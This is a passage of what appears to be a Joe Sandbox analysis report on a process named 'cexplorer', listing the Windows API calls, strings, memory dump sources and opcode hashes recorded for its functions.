• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8,?,?,?,?,035572CE,035550B3,035550FA,?), ref: 03557133
• GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8,?,?,?), ref: 0355714E
• WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8), ref: 03557154
Strings
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FileHandleWrite
• String ID: Error$Runtime error at 00000000
• API String ID: 3320372497-2970929446
• Opcode ID: 7953d79114716f86f8b611786d14b46e172766e0816fed27169f3b437f07acd2
• Instruction ID: 6155064ea2ca723de11240d780280e117146f4558a93be8ac6e102d8cce49c32
• Opcode Fuzzy Hash: 7953d79114716f86f8b611786d14b46e172766e0816fed27169f3b437f07acd2
• Instruction Fuzzy Hash: C5F046986407C2BDE610F2607C12F6E227CB384E50F580147BA64DD0F5C6B060C49A21
APIs
• UnhookWindowsHookEx.USER32(?), ref: 035E9B0F
• UnhookWindowsHookEx.USER32(?), ref: 035E9B2C
• UnhookWindowsHookEx.USER32(?), ref: 035E9B49
• UnhookWindowsHookEx.USER32(?), ref: 035E9B66
• UnhookWindowsHookEx.USER32(?), ref: 035E9B83
• PostMessageW.USER32(0000FFFF,00000000,00000000,00000000), ref: 035E9B93
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: HookUnhookWindows$MessagePost
• String ID:
• API String ID: 3984533346-0
• Opcode ID: 1157d07f5cd797f2430f2113c1bc2ea65e3b908a33b6ca4b7dd92c10571cb8f7
• Instruction ID: 7b141feb0f2743b310c13d309a772347af0a39e20de21067724caa2b0fb51304
• Opcode Fuzzy Hash: 1157d07f5cd797f2430f2113c1bc2ea65e3b908a33b6ca4b7dd92c10571cb8f7
• Instruction Fuzzy Hash: 10215D796043009FE71AEA58E488F6477E4FB9A300F454089F900DF3B5C378E849EB51
APIs
• GetStdHandle.KERNEL32(000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543BE
• WriteFile.KERNEL32(00000000,000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543C4
• GetStdHandle.KERNEL32(000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543E3
• WriteFile.KERNEL32(00000000,000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543E9
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000,?), ref: 03554400
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000), ref: 03554406
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FileHandleWrite
• String ID:
• API String ID: 3320372497-0
• Opcode ID: 40a7d65b40c3662cfbc5939f71a90fef1db081d73846bb41c4390b3834194280
• Instruction ID: b0fda56dc3e57a573e4252eaf7ecf80949838aab5ff38afbd06c034a788ad134
• Opcode Fuzzy Hash: 40a7d65b40c3662cfbc5939f71a90fef1db081d73846bb41c4390b3834194280
• Instruction Fuzzy Hash: 2C01A4ED245351BEE101F2A9BC98F6F62BCEB986A9F104652791CDA0F0CA20AC448771
APIs
• Sleep.KERNEL32(00000000), ref: 03553B8B
• Sleep.KERNEL32(0000000A,00000000), ref: 03553BA1
• Sleep.KERNEL32(00000000), ref: 03553BCF
• Sleep.KERNEL32(0000000A,00000000), ref: 03553BE5
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 42ea0d57a6750102bd73298e0ad3f41974eb6ef704f7a53cbdecf75947008d93
• Instruction ID: 94834c388c01950cba76b9bc0fb5d6f35ac95e6bdbfc13ee8222142e8fd2707b
• Opcode Fuzzy Hash: 42ea0d57a6750102bd73298e0ad3f41974eb6ef704f7a53cbdecf75947008d93
• Instruction Fuzzy Hash: E2C108BA6013518FC715CF69F4A4716BBA1FB85350F0886AFEC49CB3A5C770A44AC790
APIs
• VirtualQuery.KERNEL32(?,?,0000001C,00000000,0356B934), ref: 0356B7BB
• GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0356B7DF
• GetModuleFileNameW.KERNEL32(MZP,?,00000105), ref: 0356B7FA
• LoadStringW.USER32(00000000,0000FFE9,?,00000100), ref: 0356B895
Strings
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID: MZP
• API String ID: 3990497365-2889622443
• Opcode ID: 3c737965b4ec9576d0ee8a4755905ea0b16ee3f21f51c2d6b16f0e89e0c39ff7
• Instruction ID: 3292a607312dafa673f80e908299677ccf1e24f3227c0f0c96b800f003ea4aa5
• Opcode Fuzzy Hash: 3c737965b4ec9576d0ee8a4755905ea0b16ee3f21f51c2d6b16f0e89e0c39ff7
• Instruction Fuzzy Hash: 9F412A74A003599FDB20EF69DC80AC9B7F9BB89310F4040E6E908E7261DB75AE948F50
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,03708820), ref: 03555E72
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 03555E78
• GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation,03708820), ref: 03555E94
Strings
Memory Dump Source
• Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
• Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: GetLogicalProcessorInformation$kernel32.dll
• API String ID: 4275029093-812649623
• Opcode ID: a77de60801ab65f20dec30397acb26f00790d0608fd11a7f5f16a38b753e44e0
• Instruction ID: b890d6a5fbffca06b727d728ee340ec0e4076700c7dbc85c4869cf307e464137
• Opcode Fuzzy Hash: a77de60801ab65f20dec30397acb26f00790d0608fd11a7f5f16a38b753e44e0
• Instruction Fuzzy Hash: BA1196B5904304AEDB10EBA4F8A1B5DB7B8FF41210F1848A7FC06DA171F735B680C615
                                                                                                            APIs
                                                                                                              • Part of subcall function 035E7E98: SHGetPathFromIDListW.SHELL32(?,?), ref: 035E7EEC
                                                                                                            • GlobalAddAtomW.KERNEL32(00000000), ref: 035E9399
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 035E93BE
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            • GlobalDeleteAtom.KERNEL32(?), ref: 035E93D6
                                                                                                            Strings
                                                                                                            • error, xrefs: 035E9384
                                                                                                            • ERROR OnNavigationComplete: PostMessage fail, xrefs: 035E93C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteMessagePost$FromListPath
                                                                                                            • String ID: ERROR OnNavigationComplete: PostMessage fail$error
                                                                                                            • API String ID: 3733832026-3584304341
                                                                                                            • Opcode ID: 6539d4ad2e7fd2d129163ee15cee22e4dee5ddccce3db22b8d4e42760959e084
                                                                                                            • Instruction ID: 66d64d56a2970f887e01917e8258ec5fa3aa3b76cdc8cbf863f05e1725a00471
                                                                                                            • Opcode Fuzzy Hash: 6539d4ad2e7fd2d129163ee15cee22e4dee5ddccce3db22b8d4e42760959e084
                                                                                                            • Instruction Fuzzy Hash: 9C11FA79604309AFDB45EBA8E89099DB7F8FF8D210B4144A2F814DB670E734AA41CB24
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CursorForegroundFromParentPoint
                                                                                                            • String ID: 3
                                                                                                            • API String ID: 109862150-1842515611
                                                                                                            • Opcode ID: fd582e6bc56b5b9cfc936fd9d26e6ecb18590f5be6c72eedee1f5cfb5f30c062
                                                                                                            • Instruction ID: 160796d938db574542441521f7b4bd92d989decda428fc65e7878cd5f1a91e7f
                                                                                                            • Opcode Fuzzy Hash: fd582e6bc56b5b9cfc936fd9d26e6ecb18590f5be6c72eedee1f5cfb5f30c062
                                                                                                            • Instruction Fuzzy Hash: 0011D279D0024ADFCB05DFA8D480AAEBBB5BF49301F1984A6D824AB260D3349A01CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb00132243ad18606eadb56add95c490add5f3a77fc3275524f45831cfc31c99
                                                                                                            • Instruction ID: 669551502c541266fbdb9b16807275a97b134fbb74dc4326a8305f4b42d57208
                                                                                                            • Opcode Fuzzy Hash: eb00132243ad18606eadb56add95c490add5f3a77fc3275524f45831cfc31c99
                                                                                                            • Instruction Fuzzy Hash: 2FD18239A00659DFCF10EF94F4808FEBBB9FF49610F8444A5E840BB265D634AE49DB61
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,TFolderTreeView,00000000), ref: 035E8B2B
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • TFolderTreeView, xrefs: 035E8B20
                                                                                                            • ERROR SetBrowsePathInno: FindWindowEx failed, xrefs: 035E8B39
                                                                                                            • ERROR SetBrowsePathInno: Item not found , xrefs: 035E8C32
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteFindMessagePostWindow
                                                                                                            • String ID: ERROR SetBrowsePathInno: FindWindowEx failed$ERROR SetBrowsePathInno: Item not found $TFolderTreeView
                                                                                                            • API String ID: 1899056751-2700439369
                                                                                                            • Opcode ID: 2db3f162cd9ebf48537bb01a093c807243a96eef6b30f5e86085931491f2ac06
                                                                                                            • Instruction ID: 221ac0a9ca252de19827cf2cd77e5155285f68064dc7487b4e4667bc741bafa6
                                                                                                            • Opcode Fuzzy Hash: 2db3f162cd9ebf48537bb01a093c807243a96eef6b30f5e86085931491f2ac06
                                                                                                            • Instruction Fuzzy Hash: 82414074D0031E9FCF18EFA8E8546AEB7F9BB49B10F5444A5E415BB2A0D7346940CB64
                                                                                                            APIs
                                                                                                              • Part of subcall function 035E81D4: SendMessageW.USER32(?,00000407,00000000,00000000), ref: 035E821C
                                                                                                            • GetTickCount.KERNEL32 ref: 035E954D
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • ERROR SetDialogYps: Advise fail: , xrefs: 035E958F
                                                                                                            • ERROR SetDialogYps: IExplorerBrowser not found, xrefs: 035E9515
                                                                                                            • <nopathentered>, xrefs: 035E94CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobalMessage$CountDeletePostSendTick
                                                                                                            • String ID: <nopathentered>$ERROR SetDialogYps: Advise fail: $ERROR SetDialogYps: IExplorerBrowser not found
                                                                                                            • API String ID: 387905791-4011323065
                                                                                                            • Opcode ID: 2d6a9fd6e8474723b28aac858328e4648e74f9b51e784b4d70b212a4eefcafd6
                                                                                                            • Instruction ID: d5d89a33eda0790d9d1d804ef91482bcf1baa0aec50cda37842fc23b50150245
                                                                                                            • Opcode Fuzzy Hash: 2d6a9fd6e8474723b28aac858328e4648e74f9b51e784b4d70b212a4eefcafd6
                                                                                                            • Instruction Fuzzy Hash: 13412D74E042499FDB09DFA8E9509DEBBF4FB88310F1085A6E814E7760D734AA01CFA4
                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,035692E3), ref: 03569286
                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,035692E3), ref: 0356928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                            • String ID: $yyyy
                                                                                                            • API String ID: 3303714858-404527807
                                                                                                            • Opcode ID: 8447542f90029efb1463419d3e45756a7b2e10ee74d3a85365feedebf0e622cd
                                                                                                            • Instruction ID: 6a973ea73bfb3287f764a1bc875c802a154383d0077dc76a7f4c413b1544d4af
                                                                                                            • Opcode Fuzzy Hash: 8447542f90029efb1463419d3e45756a7b2e10ee74d3a85365feedebf0e622cd
                                                                                                            • Instruction Fuzzy Hash: 3D216035A047199BDB50EF94E8909AEB3F8FF48710F4144A6FC45EB264E730AE40C7A5
                                                                                                            APIs
                                                                                                            • GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                            • PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                            • GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteMessagePost
                                                                                                            • String ID: ...
                                                                                                            • API String ID: 937182704-440645147
                                                                                                            • Opcode ID: c4a29169dcf2e211a59eb967db01b7d4ff7878de313b631b038e5d228139cabb
                                                                                                            • Instruction ID: fc48357d42c848533142d968571e8d90de6eb011ff5d1a24df5acb757a7349b9
                                                                                                            • Opcode Fuzzy Hash: c4a29169dcf2e211a59eb967db01b7d4ff7878de313b631b038e5d228139cabb
                                                                                                            • Instruction Fuzzy Hash: 53113078A04349EFDB04EBA8E955A9DB3F8FB49300F5040A2F810EB670D734AE00DB15
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 035E7486
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 035E749D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                             • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                             • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow
                                                                                                            • String ID: CabinetWClass$ExploreWClass
                                                                                                            • API String ID: 1378638983-1982176359
                                                                                                            • Opcode ID: 05cfcf3eada7e2669a2b3c44329737e18c20c45f7d8d48bc0da45499839481eb
                                                                                                            • Instruction ID: fafbb7142004bf1b7f224bb4d0b1e27932cc168c69cd89f1e4f553e91086663b
